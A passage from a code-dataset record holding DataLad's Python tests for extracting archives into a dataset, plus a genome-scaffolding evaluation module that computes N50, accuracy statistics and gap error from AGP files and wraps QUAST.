to be able to pass path into add_archive_content\n # We could mock but I mean for the API\n\n # no repo yet\n assert_raises(NoDatasetFound, add_archive_content, \"nonexisting.tar.gz\")\n ds = Dataset(repo_path).create()\n res = ds.add_archive_content(\"nonexisting.tar.gz\", on_failure='ignore')\n assert_in_results(res, action='add-archive-content',\n status='impossible')\n repo = ds.repo\n\n # we can't add a file from outside the repo ATM\n res = ds.add_archive_content(Path(path_orig) / '1.tar.gz',\n on_failure='ignore')\n assert_in_results(\n res,\n action='add-archive-content',\n status='impossible',\n type=\"dataset\",\n message=\"Can not add archive outside of the dataset\"\n )\n\n # Let's add first archive to the repo so we could test\n with swallow_outputs():\n repo.add_url_to_file('1.tar.gz', opj(url, '1.tar.gz'))\n for s in range(1, 5):\n repo.add_url_to_file('%du/1.tar.gz' % s,\n opj(url, '%du/1.tar.gz' % s))\n repo.commit(\"added 1.tar.gz\")\n\n key_1tar = repo.get_file_annexinfo('1.tar.gz')['key'] # will be used in the test later\n\n def d1_basic_checks():\n ok_(exists('1'))\n ok_file_under_git('1', '1 f.txt', annexed=True)\n ok_file_under_git(opj('1', 'd', '1d'), annexed=True)\n ok_archives_caches(repo_path, 0)\n\n # and by default it just does it, everything goes to annex\n res = add_archive_content('1.tar.gz')\n assert_in_results(\n res,\n action='add-archive-content',\n status='ok'\n )\n d1_basic_checks()\n\n # If ran again, should proceed just fine since the content is the same\n # so no changes would be made really\n res = add_archive_content('1.tar.gz')\n assert_in_results(\n res,\n action='add-archive-content',\n status='ok'\n )\n\n # But that other one carries updated file, so should fail due to\n # overwrite\n res = add_archive_content(Path('1u') / '1.tar.gz',\n use_current_dir=True, on_failure='ignore')\n assert_in_results(\n res,\n action='add-archive-content',\n status='error',\n )\n assert_in('exists, but would be overwritten by new file',\n res[0]['message'])\n # but should do fine if overrides are allowed\n add_archive_content(Path('1u') / '1.tar.gz', existing='overwrite',\n use_current_dir=True)\n add_archive_content(Path('2u') / '1.tar.gz',\n existing='archive-suffix', use_current_dir=True)\n add_archive_content(Path('3u') / '1.tar.gz',\n existing='archive-suffix', use_current_dir=True)\n add_archive_content(Path('4u') / '1.tar.gz',\n existing='archive-suffix', use_current_dir=True)\n\n # rudimentary test\n assert_equal(sorted(map(basename, glob(opj(repo_path, '1', '1*')))),\n ['1 f-1.1.txt', '1 f-1.2.txt', '1 f-1.txt', '1 f.txt'])\n whereis = repo.whereis(glob(opj(repo_path, '1', '1*')))\n # they all must be the same\n assert(all([x == whereis[0] for x in whereis[1:]]))\n\n # and we should be able to reference it while under subdirectory\n subdir = opj(repo_path, 'subdir')\n with chpwd(subdir, mkdir=True):\n add_archive_content(opj(pardir, '1.tar.gz'), dataset=ds.path,\n use_current_dir=True)\n d1_basic_checks()\n # or we could keep relative path and also demand to keep the archive prefix\n # while extracting under original (annex root) dir\n add_archive_content(opj(pardir, '1.tar.gz'),\n dataset=ds.path,\n add_archive_leading_dir=True)\n\n with chpwd(opj(repo_path, '1')):\n d1_basic_checks()\n\n with chpwd(repo_path):\n # test with excludes and renames and annex options\n ds.add_archive_content(\n '1.tar.gz', exclude=['d'], rename=['/ /_', '/^1/2'],\n annex_options=\"-c annex.largefiles=exclude=*.txt\",\n delete=True)\n # no conflicts since new name\n ok_file_under_git('2', '1_f.txt', annexed=False)\n assert_false(exists(opj('2', 'd')))\n assert_false(exists('1.tar.gz')) # delete was in effect\n\n # now test ability to extract within subdir\n with chpwd(opj(repo_path, 'd1'), mkdir=True):\n # Let's add first archive to the repo so we could test\n # named the same way but different content\n with swallow_outputs():\n repo.add_url_to_file('d1/1.tar.gz', opj(url, 'd1', '1.tar.gz'))\n repo.commit(\"added 1.tar.gz in d1\")\n\n def d2_basic_checks():\n ok_(exists('1'))\n ok_file_under_git('1', '2 f.txt', annexed=True)\n ok_file_under_git(opj('1', 'd2', '2d'), annexed=True)\n ok_archives_caches(repo.path, 0)\n add_archive_content('1.tar.gz', dataset=ds.path)\n d2_basic_checks()\n\n # in manual tests ran into the situation of inability to obtain on a single run\n # a file from an archive which was coming from a dropped key. I thought it was\n # tested in custom remote tests, but I guess not sufficiently well enough\n repo.drop(opj('1', '1 f.txt')) # should be all kosher\n repo.get(opj('1', '1 f.txt'))\n ok_archives_caches(repo.path, 1, persistent=True)\n ok_archives_caches(repo.path, 0, persistent=False)\n\n repo.drop(opj('1', '1 f.txt')) # should be all kosher\n repo.drop(key_1tar, key=True) # is available from the URL -- should be kosher\n repo.get(opj('1', '1 f.txt')) # that what managed to not work\n\n # TODO: check if persistent archive is there for the 1.tar.gz\n\n # We should be able to drop everything since available online\n with swallow_outputs():\n clean(dataset=ds)\n repo.drop(key_1tar, key=True) # is available from the URL -- should be kosher\n\n ds.drop(opj('1', '1 f.txt')) # should be all kosher\n ds.get(opj('1', '1 f.txt')) # and should be able to get it again\n\n # bug was that dropping didn't work since archive was dropped first\n repo.call_annex([\"drop\", \"--all\"])\n\n # verify that we can't drop a file if archive key was dropped and online archive was removed or changed size! ;)\n repo.get(key_1tar, key=True)\n unlink(opj(path_orig, '1.tar.gz'))\n with assert_raises(CommandError) as e:\n repo.drop(key_1tar, key=True)\n assert_equal(e.kwargs['stdout_json'][0]['success'], False)\n assert_result_values_cond(\n e.kwargs['stdout_json'], 'note',\n lambda x: '(Use --force to override this check, or adjust numcopies.)' in x\n )\n assert exists(opj(repo.path, repo.get_contentlocation(key_1tar)))\n\n\n@integration\n@assert_cwd_unchanged(ok_to_chdir=True)\n@with_tree(**tree1args)\n@serve_path_via_http()\n@with_tempfile(mkdir=True)\ndef test_add_archive_content_strip_leading(path_orig=None, url=None, repo_path=None):\n with chpwd(repo_path):\n ds = Dataset(repo_path).create(force=True)\n repo = ds.repo\n # Let's add first archive to the repo so we could test\n with swallow_outputs():\n repo.add_url_to_file('1.tar.gz', opj(url, '1.tar.gz'))\n repo.commit(\"added 1.tar.gz\")\n\n add_archive_content('1.tar.gz', strip_leading_dirs=True)\n ok_(not exists('1'))\n ok_file_under_git(ds.path, '1 f.txt', annexed=True)\n ok_file_under_git('d', '1d', annexed=True)\n ok_archives_caches(ds.path, 0)\n\n\n@assert_cwd_unchanged(ok_to_chdir=True)\n@with_tree(tree={\"1.zip\": {\"dir\": {\"bar\": \"blah\"}, \"foo\": \"blahhhhh\"}})\ndef test_add_archive_content_zip(repo_path=None):\n ds = Dataset(repo_path).create(force=True)\n with chpwd(repo_path):\n with swallow_outputs():\n ds.save(\"1.zip\", message=\"add 1.zip\")\n add_archive_content(\"1.zip\")\n ok_file_under_git(ds.pathobj / \"1\" / \"foo\", annexed=True)\n ok_file_under_git(ds.pathobj / \"1\" / \"dir\" / \"bar\", annexed=True)\n ok_archives_caches(ds.path, 0)\n\n\n@with_tree(tree={\"ds\": {\"1.tar.gz\": {\"foo\": \"abc\"}},\n \"notds\": {\"2.tar.gz\": {\"bar\": \"def\"}}})\ndef test_add_archive_content_absolute_path(path=None):\n ds = Dataset(opj(path, \"ds\")).create(force=True)\n repo = ds.repo\n ds.save(\"1.tar.gz\", message=\"1.tar.gz\")\n abs_tar_gz = opj(path, \"ds\", \"1.tar.gz\")\n add_archive_content(abs_tar_gz, dataset=ds)\n ok_file_under_git(opj(path, \"ds\", \"1\", \"foo\"), annexed=True)\n commit_msg = repo.format_commit(\"%B\")\n # The commit message uses relative paths.\n assert_not_in(abs_tar_gz, commit_msg)\n assert_in(\"1.tar.gz\", commit_msg)\n res = add_archive_content(opj(path, \"notds\", \"2.tar.gz\"),\n dataset=ds, on_failure='ignore')\n\n assert_in_results(\n res,\n action='add-archive-content',\n status='impossible',\n message='Can not add archive outside of the dataset',\n )\n\n\n@assert_cwd_unchanged(ok_to_chdir=True)\n@with_tree(**tree4uargs)\ndef test_add_archive_use_archive_dir(repo_path=None):\n ds = Dataset(repo_path).create(force=True)\n with chpwd(repo_path):\n # Let's add first archive to the repo with default setting\n archive_path = opj('4u', '1.tar.gz')\n # check it gives informative error if archive is not already added\n res = add_archive_content(archive_path, on_failure='ignore')\n message = \\\n \"Can not add an untracked archive. Run 'datalad save 4u\\\\1.tar.gz'\"\\\n if on_windows else \\\n \"Can not add an untracked archive. Run 'datalad save 4u/1.tar.gz'\"\n assert_in_results(\n res,\n action='add-archive-content',\n message=message,\n status='impossible')\n\n with swallow_outputs():\n ds.save(archive_path)\n\n ok_archives_caches(ds.path, 0)\n add_archive_content(archive_path, strip_leading_dirs=True,\n use_current_dir=True)\n ok_(not exists(opj('4u', '1 f.txt')))\n ok_file_under_git(ds.path, '1 f.txt', annexed=True)\n ok_archives_caches(ds.path, 0)\n\n # and now let's extract under archive dir\n add_archive_content(archive_path, strip_leading_dirs=True)\n ok_file_under_git(ds.path, opj('4u', '1 f.txt'), annexed=True)\n ok_archives_caches(ds.path, 0)\n\n add_archive_content(opj('4u', 'sub.tar.gz'))\n ok_file_under_git(ds.path, opj('4u', 'sub', '2 f.txt'), annexed=True)\n ok_archives_caches(ds.path, 0)\n\n\n@with_tree(\n tree={\n 'archives': {\n '1.gz': '1',\n '2.xz': '2',\n '3.lzma': '3',\n # TODO: add any other stream compression we might be supporting via 7zip or patool?\n },\n }\n)\ndef test_add_archive_single_file(repo_path=None):\n ds = Dataset(repo_path).create(force=True)\n with chpwd(repo_path):\n archives = glob('archives/*')\n ds.save(archives, message='Added archives')\n\n for archive in archives:\n archive_name = os.path.splitext(archive)[0]\n archive_content = os.path.basename(archive_name)\n ds.add_archive_content(archive)\n ok_file_has_content(archive_name, archive_content)\n\n\nclass TestAddArchiveOptions():\n # few tests bundled with a common setup/teardown to minimize boiler plate\n # nothing here works on windows, no even teardown(), prevent failure at the\n # origin\n def setup(self):\n repo_path = tempfile.mkdtemp(**get_tempfile_kwargs(prefix=\"tree\"))\n create_tree(\n repo_path,\n {'1.tar': {'file.txt': 'load',\n '1.dat': 'load2'}})\n self.ds = ds = Dataset(repo_path)\n ds.create(force=True)\n self.annex = ds.repo\n # Let's add first archive to the annex so we could test\n ds.save('1.tar', message=\"added 1.tar\")\n\n def teardown(self):\n # so we close any outstanding batch process etc\n self.annex.precommit()\n rmtemp(self.ds.path)\n\n def test_add_delete(self):\n # To test that .tar gets removed\n self.ds.add_archive_content('1.tar', strip_leading_dirs=True,\n delete=True)\n assert_false(lexists(self.ds.pathobj / '1.tar'))\n\n # git-annex regression\n # https://git-annex.branchable.com/bugs/regression__58___annex_add_of_moved_file_errors_out/\n @skip_if(\n '10.20220525' <= external_versions['cmd:annex'] < '10.20220706', # approx when was fixed\n msg=\"buggy git-annex release\"\n )\n def test_add_archive_leading_dir(self):\n import os\n os.mkdir(self.ds.pathobj / 'sub')\n f123 = Path('sub') / '123.tar'\n Path(self.ds.pathobj / '1.tar').rename(self.ds.pathobj / Path(f123))\n self.annex.remove('1.tar', force=True)\n self.ds.save(message=\"renamed\")\n\n self.ds.add_archive_content(\n f123,\n add_archive_leading_dir=True,\n strip_leading_dirs=True\n )\n\n ok_file_under_git(self.ds.path,\n str(Path('sub') / '123' / 'file.txt'),\n annexed=True)\n\n # https://github.com/datalad/datalad/issues/6187\n @skip_if_adjusted_branch\n def test_add_delete_after_and_drop(self):\n # To test that .tar gets removed\n # but that new stuff was added to annex repo. We know the key since\n # default backend and content remain the same\n key1 = 'MD5E-s5--db87ebcba59a8c9f34b68e713c08a718.dat'\n repo = self.ds.repo\n # previous state of things:\n prev_files = list(find_files('.*', self.ds.path))\n assert_equal(repo.whereis(key1, key=True, output='full'), {})\n\n commits_prior = list(repo.get_branch_commits_('git-annex'))\n self.ds.add_archive_content('1.tar',\n strip_leading_dirs=True, delete_after=True)\n commits_after = list(repo.get_branch_commits_('git-annex'))\n # There should be a single commit for all additions +1 to initiate\n # datalad-archives gh-1258\n # If faking dates, there should be another +1 because\n # annex.alwayscommit isn't set to false.\n assert_equal(len(commits_after),\n # We expect one more when faking dates because\n # annex.alwayscommit isn't set to false.\n len(commits_prior) + 2 + repo.fake_dates_enabled)\n assert_equal(prev_files, list(find_files('.*', self.ds.path)))\n w = repo.whereis(key1, key=True, output='full')\n assert_equal(len(w), 2) # in archive, and locally since we didn't drop\n\n # Let's now do the same but also drop content\n self.ds.add_archive_content('1.tar',\n strip_leading_dirs=True, delete_after=True,\n drop_after=True)\n assert_equal(prev_files, list(find_files('.*', self.ds.path)))\n w = repo.whereis(key1, key=True, output='full')\n assert_equal(len(w), 1) # in archive\n\n # there should be no .datalad temporary files hanging around\n self.assert_no_trash_left_behind()\n\n def test_add_delete_after_and_drop_subdir(self=None):\n os.mkdir(opj(self.annex.path, 'subdir'))\n mv_out = self.annex.call_git(\n ['mv', '1.tar', 'subdir']\n )\n self.annex.commit(\"moved into subdir\")\n with chpwd(self.annex.path):\n # was failing since deleting without considering if tarball\n # was extracted in that tarball directory\n commits_prior_master = list(self.annex.get_branch_commits_())\n commits_prior = list(self.annex.get_branch_commits_('git-annex'))\n add_out = self.ds.add_archive_content(\n opj('subdir', '1.tar'),\n delete_after=True,\n drop_after=True)\n assert_repo_status(self.annex.path)\n if not self.annex.is_managed_branch():\n # whole counting logic here is ignorant of adjusted branches\n commits_after_master = list(self.annex.get_branch_commits_())\n commits_after = list(self.annex.get_branch_commits_('git-annex'))\n # There should be a single commit for all additions +1 to\n # initiate datalad-archives gh-1258. If faking dates,\n # there should be another +1 because annex.alwayscommit\n # isn't set to false.\n assert_equal(len(commits_after),\n len(commits_prior) + 2 + self.annex.fake_dates_enabled)\n assert_equal(len(commits_after_master), len(commits_prior_master))\n # there should be no .datalad temporary files hanging around\n self.assert_no_trash_left_behind()\n\n # and if we add some untracked file, redo, there should be no changes\n # to master and file should remain not committed\n create_tree(self.annex.path, {'dummy.txt': '123'})\n assert_true(self.annex.dirty) # untracked file\n add_out = add_archive_content(\n opj('subdir', '1.tar'),\n delete_after=True,\n drop_after=True,\n allow_dirty=True)\n assert_repo_status(self.annex.path, untracked=['dummy.txt'])\n assert_equal(len(list(self.annex.get_branch_commits_())),\n len(commits_prior_master))\n\n # there should be no .datalad temporary files hanging around\n self.assert_no_trash_left_behind()\n\n def assert_no_trash_left_behind(self):\n assert_equal(\n list(find_files(r'\\.datalad..*', self.annex.path, exclude=\"config\",\n dirs=True)),\n []\n )\n\n @xfail_buggy_annex_info\n def test_override_existing_under_git(self):\n create_tree(self.ds.path, {'1.dat': 'load2'})\n self.ds.save('1.dat', to_git=True, message='added to git')\n self.ds.add_archive_content(\n '1.tar', strip_leading_dirs=True,\n )\n # and we did not bother adding it to annex (for now) -- just skipped\n # since we have it and it is the same\n ok_file_under_git(self.ds.path, '1.dat', annexed=False)\n\n # but if we say 'overwrite' -- we would remove and replace\n self.ds.add_archive_content(\n '1.tar', strip_leading_dirs=True, delete=True\n , existing='overwrite'\n )\n ok_file_under_git(self.ds.path, '1.dat', annexed=True)\n" } ]
390
jim-bo/scafathon
https://github.com/jim-bo/scafathon
313b35b1d36ec5623f931f9e74f34745f428e040
9e5e059ee9ae74a2d16dc8b9356cf6e2bb8472fe
6a33f68ca49d7c3ff95aadabd2b9fb7980fd950a
refs/heads/master
2021-01-01T16:25:00.712869
2014-02-25T17:33:59
2014-02-25T17:33:59
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5037604570388794, "alphanum_fraction": 0.5210442543029785, "avg_line_length": 23.13263511657715, "blob_id": "ff878cc9510ef048b68b1a742c6a9967b68a4f8b", "content_id": "11be2c7d435fa5f3cdd2beda3049169f4b149460", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13828, "license_type": "permissive", "max_line_length": 117, "num_lines": 573, "path": "/utils/eval.py", "repo_name": "jim-bo/scafathon", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport math\nimport numpy as np\nimport logging\nimport subprocess\nimport networkx as nx\n\n### definitions ###\nagp_dt = np.dtype([\\\n ('scaf_name', 'S255'),\\\n ('scaf_start', np.long),\\\n ('scaf_stop', np.long),\\\n ('scaf_idx', np.long),\\\n ('comp_type', 'S50'),\\\n ('comp_name', 'S255'),\\\n ('comp_start', np.long),\\\n ('comp_stop', np.long),\\\n ('comp_orien', np.long),\\\n ('comp_linkage', np.long),\\\n])\n\n### private functions ###\n\ndef _load_agp(fpath):\n ''' read agp file into array.'''\n\n # read in agp.\n fin = open(fpath, \"rb\")\n lines = fin.readlines()\n fin.close()\n\n # count number of lines minus comments.\n cnt = 0\n for line in lines:\n if line[0] != \"#\" and len(line) != 0 and line.strip().split()[0] != \"RUNTIME:\":\n cnt += 1\n\n # instantiate array.\n agp_edges = np.zeros(cnt, dtype=agp_dt)\n\n # parse agp.\n idx = 0\n for line in lines:\n # tokenize.\n if line[0] == \"#\": continue\n tmp = line.strip().split()\n if len(tmp) == 0: continue\n if tmp[0] == \"RUNTIME:\": continue\n\n # get general tokenize.\n agp_edges[idx]['scaf_name'] = tmp[0]\n agp_edges[idx]['scaf_start'] = int(float(tmp[1]))\n agp_edges[idx]['scaf_stop'] = int(float(tmp[2]))\n agp_edges[idx]['scaf_idx'] = int(float(tmp[3]))\n agp_edges[idx]['comp_type'] = tmp[4]\n\n # contig.\n if tmp[4] == \"W\":\n # get parts.\n agp_edges[idx]['comp_name'] = tmp[5]\n agp_edges[idx]['comp_start'] = int(tmp[6])\n agp_edges[idx]['comp_stop'] = int(tmp[7])\n if tmp[8] == \"+\":\n agp_edges[idx]['comp_orien'] = 0\n else:\n agp_edges[idx]['comp_orien'] = 1\n\n else:\n\n # save entry.\n agp_edges[idx]['comp_name'] = tmp[6]\n agp_edges[idx]['comp_start'] = 1\n agp_edges[idx]['comp_stop'] = int(tmp[5])\n if tmp[7] != \"yes\":\n agp_edges[idx]['comp_linkage'] = 0\n else:\n agp_edges[idx]['comp_linkage'] = 1\n\n\n # update index.\n idx += 1\n\n # shirnk array.\n agp_edges.resize(idx)\n\n return agp_edges\n\ndef _agp_graph(fpath, RG=None):\n ''' returns agp graph '''\n\n # load agp array.\n agp_edges = _load_agp(fpath)\n\n # make digraph.\n G = nx.DiGraph()\n\n # add nodes.\n for i in range(agp_edges.size):\n\n # skip contigs themselves.\n if agp_edges[i]['comp_type'] != 'W': continue\n\n # add node info.\n name = agp_edges[i]['comp_name']\n width = agp_edges[i]['comp_stop']\n orien = agp_edges[i]['comp_orien']\n start = agp_edges[i]['scaf_start']\n stop = agp_edges[i]['scaf_stop']\n scaf = agp_edges[i]['scaf_name']\n G.add_node(agp_edges[i]['comp_name'], {'width':width, 'orien':orien, 'start':start, 'stop':stop,'scaf':scaf})\n\n # add edges.\n for i in range(agp_edges.size):\n\n # skip contigs themselves.\n if agp_edges[i]['comp_type'] != 'N': continue\n if i == agp_edges.shape[0] - 1: continue\n\n # add sorted edges.\n ctg1 = agp_edges[i-1]['comp_name']\n ctg2 = agp_edges[i+1]['comp_name']\n gap = agp_edges[i]['comp_stop']\n\n G.add_edge(ctg1, ctg2, {'gap':gap})\n\n # if RG is supplied ensure all contigs exist.\n if RG != None:\n for n in RG.nodes():\n if G.has_node(n) == False:\n G.add_node(n, RG.node[n])\n\n # done.\n return G\n\ndef _uconn_N50(RG, TG):\n \"\"\" calcultes UCONN N50s\"\"\"\n\n # flip TG to be most consistent with RG.\n TG = _dag_flip(RG, TG)\n\n # calculate teh TPN50\n min_size = 1\n WG_REFN50 = _calculate_n50(RG, gap=True, min_size=min_size)\n NG_REFN50 = _calculate_n50(RG, gap=False, min_size=min_size)\n\n # calculate reported n50\n WG_N50 = _calculate_n50(TG, gap=True, min_size=min_size)\n NG_N50 = _calculate_n50(TG, gap=False, min_size=min_size)\n\n # remove edges not in TG.\n TG = _remove_difference(RG, TG)\n\n # calculate teh TPN50\n WG_TPN50 = _calculate_n50(TG, gap=True, min_size=min_size)\n NG_TPN50 = _calculate_n50(TG, gap=False, min_size=min_size)\n\n # yield results.\n return WG_N50, WG_TPN50, TG\n\ndef _compute_formula(true_adj, test_adj, n):\n ''' computes statistics when TG is already oriented. This\n method computes A and B exactly, but uses formulas\n to find C and D.'''\n\n # set vars.\n m = len(true_adj)\n N = n * (n-1)\n\n # compute the A statistic set.\n A = true_adj.intersection(test_adj)\n\n # compute the B statistic set.\n B = test_adj.difference(true_adj)\n\n # compute the C statistic set.\n C = m - len(A)\n\n # compute the D statistic set.\n D = N - m - len(B)\n\n # return categories.\n return len(A), len(B), C, D, A\n\n\ndef _gap_deviation(RG, TG):\n ''' calculate MAPE '''\n\n # find true edges.\n radj = set(RG.edges())\n tadj = set(TG.edges())\n edges = tadj.intersection(radj)\n\n # calculate MAPE.\n s = 0.0\n for e0, e1 in edges:\n At = RG[e0][e1]['gap']\n Ft = TG[e0][e1]['gap']\n if At != 0.0:\n s += abs(float(At - Ft) / float(At))\n\n # return it.\n try:\n return (100.0 / float(len(edges))) * s\n except:\n return -1.0\n\ndef _get_runtime(agp_file):\n\n # read in agp.\n fin = open(agp_file, \"rb\")\n lines = fin.readlines()\n fin.close()\n\n if len(lines) == 0:\n return -1.0\n\n if lines[-1].count(\"RUNTIME\") == 0:\n return -1.0\n\n # parse last line.\n tmp = lines[-1].strip().split()\n\n return float(tmp[1])\n\n\ndef _sanity_check(RG, TG, A, B, C, D):\n ''' make sure these parameter make sense '''\n\n # set vars.\n n = RG.number_of_nodes()\n m = RG.number_of_edges()\n N = n * (n-1)\n\n # run check 1: m = A + C.\n check1 = m == A + C\n\n # run check 2: N - m = B + D.\n check2 = N - m == B + D\n\n # run report.\n fail = False\n\n if check1 == False:\n logging.error(\"failed check 1: m = A + C, %i = %i + %i: %i\" % (m, A, C, m == A + C))\n fail = True\n\n if check2 == False:\n logging.error(\"failed check 2: N-m = B + D, %i - %i = %i + %i: %i\" % (N, m, B, D, N-m==B+D))\n fail = True\n\n if fail == True:\n sys.exit()\n\n\ndef _dag_flip(RG, TG):\n ''' flip to make most consistant '''\n\n # check it.\n _graph_check(RG)\n _graph_check(TG)\n\n # make set of reference.\n rset = set(RG.edges())\n\n # loop over each component.\n NG = nx.DiGraph()\n for comp in nx.weakly_connected_components(TG):\n\n # turn to subgraph.\n subg = TG.subgraph(comp)\n\n # make sets.\n tset1 = set(subg.edges())\n tset2 = set([(e1, e0) for e0, e1 in tset1])\n\n # check version.\n s1 = len(rset.intersection(tset1))\n s2 = len(rset.intersection(tset2))\n\n # add to nodes to new graph.\n for n in subg.nodes():\n NG.add_node(n, subg.node[n])\n\n # add the best matching orientation.\n for e0, e1 in subg.edges():\n if s1 >= s2:\n NG.add_edge(e0, e1, subg[e0][e1])\n else:\n NG.add_edge(e1, e0, subg[e0][e1])\n\n # return it.\n return NG\n\ndef _graph_check(G):\n ''' makes sure its linear and a DAG '''\n\n # path check.\n for n in G.nodes():\n if G.number_of_edges(n) > 2:\n logging.error(\"bad scaffold graph 1 \")\n sys.exit(1)\n\n # DAG check.\n if nx.is_directed_acyclic_graph(G) == False:\n logging.error(\"bad scaffold graph 2\")\n sys.exit(1)\n\ndef _calculate_n50(G, min_size=False, gap=False):\n ''' calculates scaffold N50 given scaffold graph'''\n\n # compute the scaffold sizes.\n sizes = _calc_sizes(G, min_size,gap)\n\n # calculate n50.\n sizes.sort(reverse = True)\n s = sum(sizes)\n limit = s * 0.5\n for l in sizes:\n s -= l\n if s <= limit:\n return int(l)\n \ndef _fasta_n50(fasta_file, min_size=False, gap=False):\n ''' calculates scaffold N50 given fasta file'''\n\n # load fasta.\n seqs = _load_fasta(fasta_file)\n\n # compute the scaffold sizes.\n sizes = [len(seqs[x]) for x in seqs]\n\n # calculate n50.\n sizes.sort(reverse = True)\n s = sum(sizes)\n limit = s * 0.5\n for l in sizes:\n s -= l\n if s <= limit:\n return int(l)\n\n\ndef _calc_sizes(G, min_size, gap, scaf_only=False):\n sizes = list()\n for comp in nx.weakly_connected_components(G):\n\n # skip non scaffolds.\n if scaf_only == True:\n if len(comp) < 2:\n continue\n\n # add contig size.\n size = 0\n for n in comp:\n size += G.node[n]['width']\n\n # add gap size.\n if gap != False:\n for p,q in G.edges(comp):\n size += G[p][q]['gap']\n\n # skip this.\n if min_size != False and size < min_size:\n continue\n\n # save the size.\n sizes.append(size)\n return sizes\n\n\ndef _calc_counts(G, min_size, gap, scaf_only=False):\n sizes = list()\n for comp in nx.weakly_connected_components(G):\n\n # skip non scaffolds.\n if scaf_only == True:\n if len(comp) < 2:\n continue\n\n # add contig size.\n size = 0\n for n in comp:\n size += G.node[n]['width']\n\n # add gap size.\n if gap != False:\n for p,q in G.edges(comp):\n size += G[p][q]['gap']\n\n # skip this.\n if min_size != False and size < min_size:\n continue\n\n # save the size.\n sizes.append(len(comp))\n\n return sizes\n\ndef _remove_difference(RG, TG):\n ''' removes edges not in RG'''\n\n # make edge sets.\n rset = set(RG.edges())\n tset = set(TG.edges())\n\n # identify edges in test that shouldn't be there\n to_remove = tset.difference(rset)\n\n # remove them.\n TG.remove_edges_from(to_remove)\n\n # return modified graph.\n return TG\n\ndef _load_fasta(file_path):\n ''' loads fasta file into dictionary'''\n\n # read file into memory.\n fin = open(file_path)\n lines = fin.readlines()\n fin.close()\n\n # build dictionary.\n data = dict()\n seq = \"\"\n for line in lines:\n\n # Skip blanks.\n if len(line) < 2: continue\n if line[0] == \"#\": continue\n\n # remove blanks.\n line = line.strip()\n\n # Check for ids.\n if line.count(\">\") > 0:\n\n # Check if ending seq.\n if len(seq) > 0:\n\n # save.\n data[head] = seq.upper()\n\n # reset head.\n head = line.replace(\">\",\"\")\n seq = \"\"\n\n # skip to next line.\n continue\n\n # Filter chars.\n seq += line\n\n # save the last one.\n data[head] = seq.upper()\n\n # return dictionary.\n return data\n\n### public functions ###\n\ndef simulation_evaluation(ref_fasta, ctg_fasta, scf_fasta, ref_agp, scf_agp):\n \"\"\" evaluates the simulated dataset \"\"\"\n\n # load the reference and test graph from AGP files.\n RG = _agp_graph(ref_agp)\n TG = _agp_graph(scf_agp, RG=RG)\n\n # calculate referece and ctg n50/\n ref_N50 = _fasta_n50(ref_fasta, gap=True)\n ctg_N50 = _fasta_n50(ctg_fasta, gap=True)\n scf_N50 = _fasta_n50(scf_fasta, gap=True)\n\n # ensure we have all contigs accounted for.\n assert set(TG.nodes()) == set(RG.nodes()),\\\n 'not all contigs accounted for'\n\n # compute the exact N50\n scf_N50_2, tp_N50, LG = _uconn_N50(RG, TG)\n\n # make edge sets.\n radj = set(RG.edges())\n tadj = set(TG.edges())\n\n # calculate 4 parameters.\n n = RG.number_of_nodes()\n A, B, C, D, A_SET = _compute_formula(radj, tadj, n)\n\n # compute derivativ stats.\n sensitivity = (100*(float(A) / float(A+C)))\n ppv = (100*(float(A) / float(A+B)))\n if float(math.sqrt((A+B)*(A+C)*(D+B)*(D+C))) != 0.0:\n mcc = (100*(float((A*D)-(B*C)) / float(math.sqrt((A+B)*(A+C)*(D+B)*(D+C)))))\n else:\n mcc = 0.0\n\n # get gap deviation.\n gap_dev = _gap_deviation(RG, TG)\n\n # get the runtime.\n runtime = _get_runtime(scf_agp)\n\n # print results.\n # A B C D gapMape runtime sensitivity ppv mcc REFN50 TPN50 REPN50\n return A, B, C, D, ppv, mcc, gap_dev, runtime, ref_N50, ctg_N50, scf_N50, tp_N50\n\n\n\ndef quast_evaluation(ref, ctgs, scf, sdir, threads):\n\n # note that we are running it.\n logging.info(\"running quast %s %s %s\" % (ref, ctgs, scf))\n\n # run the comparison script.\n x = ref.split(\"/\")\n #z = '/'.join(x[0:-1] + [\"genes.gff\"])\n\n cmd = [\\\n 'python',\\\n '/opt/quast/quast.py',\\\n \"-e\",\n \"-f\",\n # \"-G\", z,\\\n \"-o\", \"./\",\\\n \"-R\", ref,\\\n \"-T\", str(threads),\\\n scf\\\n ]\n\n '''\n # remove dir.\n if os.path.isdir(sdir) == True:\n subprocess.call([\"rm\", \"-rf\", sdir])\n\n # make dir.\n if os.path.isdir(sdir) == False:\n subprocess.call(['mkdir', '-p', sdir])\n\n # make log file.\n lfile = \"%s/log.txt\" % sdir\n\n # capture output.\n with open(lfile, 'w') as fout:\n #if subprocess.call(cmd, stdout=fout, stderr=fout, cwd=sdir) != 0:\n if subprocess.call(cmd, cwd=sdir) != 0:\n logging.error('error running quast')\n return -1, -1\n '''\n # open the output.\n with open(\"%s/report.tsv\" % sdir) as fin:\n results = fin.readlines()\n tmp = list()\n for result in results:\n tmp.append(result.strip())\n results = tmp\n\n # extract results.\n lbls = list()\n res1 = list()\n res2 = list()\n cnt = 0\n for x in results:\n tmp = x.split(\"\\t\")\n lbls.append(tmp[0])\n res1.append(tmp[1])\n #res2.append(tmp[2])\n res2.append(\"\")\n #print cnt, tmp\n cnt += 1\n\n res = np.array([lbls,res1,res2])\n\n return res\n" }, { "alpha_fraction": 0.6042157411575317, "alphanum_fraction": 0.6186079382896423, "avg_line_length": 40.2152214050293, "blob_id": "48689949114dc873eecf41293abc4fd75d21d7a3", "content_id": "4183ebc78fad20ceccd2fc1d6a3f8427a87a7c28", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15703, "license_type": "permissive", "max_line_length": 159, "num_lines": 381, "path": "/scafathon.py", "repo_name": "jim-bo/scafathon", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n'''\nstandalone adapter for scripts outside of the directory structure.\n'''\n### imports ###\n\n# system\nimport time\nimport subprocess\nimport warnings\nimport argparse\nimport logging\nimport time\nimport sys\nimport os\nimport numpy as np\n\nlogging.basicConfig(level=logging.DEBUG, format='[%(levelname)s] %(message)s', )\n\n# local\nfrom utils.align import create_idx, create_aln, pair_sam, pair_sam2\nfrom utils.prep import prep_silp, prep_opera, prep_mip\nfrom utils.run import run_silp, run_opera, run_mip\nfrom utils.eval import simulation_evaluation, quast_evaluation\n\n# hack to silence argparser.\nwarnings.filterwarnings('ignore', 